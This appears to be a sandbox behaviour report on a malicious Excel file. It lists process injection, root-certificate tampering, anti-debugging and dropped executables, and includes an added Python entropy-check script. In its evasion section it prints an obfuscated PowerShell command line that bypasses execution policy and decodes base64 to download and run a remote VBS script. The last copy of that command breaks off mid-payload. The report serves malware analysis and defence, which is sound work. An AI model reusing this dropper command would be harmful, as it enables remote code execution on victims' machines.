Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0041705E push edi; iretd 13_2_00417060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_004030F0 push eax; ret 13_2_004030F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0041C8FC push cs; iretd 13_2_0041C8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401949 push 63DCA26Ah; ret 13_2_0040194E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0040214B push edx; retf 13_2_0040214E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00402101 push ebp; iretd 13_2_0040210D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0040210E push eax; retf 13_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_004021A4 push eax; retf 13_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0041125B pushfd ; ret 13_2_0041125E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_004242D9 push esp; ret 13_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_004242E3 push esp; ret 13_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401AB8 push edx; retf 13_2_00401AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00413416 push ecx; iretd 13_2_00413417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_0041ECDC push ds; iretd 13_2_0041ECDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401DF5 push ebp; iretd 13_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401DA6 push ebp; iretd 13_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00416EAA push esp; retf 13_2_00416EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401F0D push eax; retf 13_2_00401F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401FEB push edx; retf 13_2_00401FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00410FEE push ebp; iretd 13_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00410FF3 push ebp; iretd 13_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401FA4 push edx; ret 13_2_00401FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00401FBA push 0000006Ah; iretd 13_2_00401FC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A6DFA1 push ecx; ret 13_2_00A6DFB4
Source: temp_exec.exe.11.dr Static PE information: section name: .text entropy: 7.96543242796983

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\temp_exec.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PI#0034250924.xla.xlsx Stream path 'Workbook' entropy: 7.99943505066 (max. 8.0)
Source: F7A30000.0.dr Stream path 'Workbook' entropy: 7.99950221018 (max. 8.0)
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory allocated: 840000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory allocated: DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AB0101 rdtsc 13_2_00AB0101
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7663 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2301 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll Jump to dropped file
Source: C:\Windows\System32\mshta.exe TID: 3516 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672 Thread sleep count: 7663 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672 Thread sleep count: 2301 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3908 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 3932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3952 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 0000000B.00000003.522871057.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM
Source: wscript.exe, 0000000B.00000003.525565103.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.526234497.00000000050D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
Source: wscript.exe, 0000000B.00000003.517908528.0000000005029000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r))Utk5SPicnOErW...turhvQe1X2ZlNF
Source: wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6rQi'q_
Source: wscript.exe, 0000000B.00000003.521981172.0000000004DAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.521688290.0000000004D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.522157521.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r
Source: wscript.exe, 0000000B.00000003.528495125.0000000000339000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ]RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
Source: wscript.exe, 0000000B.00000003.523365177.000000000502A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523513557.0000000005049000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523199784.000000000502A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM:*'q_
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AB0101 rdtsc 13_2_00AB0101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk, 13_2_00A607AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A50080 mov ecx, dword ptr fs:[00000030h] 13_2_00A50080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A500EA mov eax, dword ptr fs:[00000030h] 13_2_00A500EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A726F8 mov eax, dword ptr fs:[00000030h] 13_2_00A726F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory allocated: page read and write | page guard Jump to behavior
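The two "Stream path 'Workbook' entropy" entries above are worth reading carefully: a 'Workbook' stream only exists in the legacy OLE2/BIFF container, so despite the .xla.xlsx name this is not an OOXML file (Excel picks the parser from the content, not the extension), and an entropy of 7.9994 against a ceiling of 8.0 means the BIFF records are not stored in the clear. A plain BIFF8 workbook (cell records, shared strings, formulas, zero padding) sits far below that; ciphertext or compressed data is what lands at 7.99+. One common cause in malicious .xls/.xla is workbook encryption with Excel's default password, but the report does not say which mechanism applies to this sample. The script below is an added example written for this page, not code from the report or the sandbox vendor; it reproduces the per-stream entropy check on constructed data (a repetitive BIFF-like blob and seeded pseudo-random bytes standing in for an encrypted stream) so the threshold behaviour can be seen offline.

```python
import math
import random


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte: 0.0 for a constant
    stream, 8.0 when all 256 byte values occur equally often."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def classify_stream(name: str, data: bytes, threshold: float = 7.9) -> dict:
    """The same test the sandbox applies per OLE stream: flag entropy near the
    8.0 ceiling. Plain BIFF8 'Workbook' content sits well below the threshold;
    RC4/AES ciphertext or deflated data comes out at 7.99+."""
    h = shannon_entropy(data)
    return {
        "stream": name,
        "size": len(data),
        "entropy": round(h, 5),
        "suspicious": h >= threshold,
    }


def constructed_samples() -> dict:
    """Constructed stand-ins, not data taken from the sample: a repetitive
    BIFF-like record blob, and seeded pseudo-random bytes (what encrypted
    content looks like to an entropy test). Seeded so runs are reproducible."""
    rng = random.Random(2024)
    biff_like = (
        b"\x09\x08\x10\x00"            # BOF-style record header (illustrative)
        + b"Sheet1\x00Invoice\x00Total\x00"
        + b"=SUM(A1:A9)\x00"
        + b"\x00" * 24                 # padding, as real BIFF streams carry
    ) * 1024
    encrypted_like = bytes(rng.getrandbits(8) for _ in range(64 * 1024))
    return {"plain_biff_like": biff_like, "encrypted_like": encrypted_like}


if __name__ == "__main__":
    for stream_name, blob in constructed_samples().items():
        print(classify_stream(stream_name, blob))
```

To run this against a real .xls/.xla, read the 'Workbook' stream out of the compound file (for example with the third-party olefile package) and pass its bytes to classify_stream; a suspicious result is the cue to try the known default workbook password before assuming custom packing.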

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: temp_exec.exe.11.dr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'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'+[ChAr]34+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'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'+[ChAr]34+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0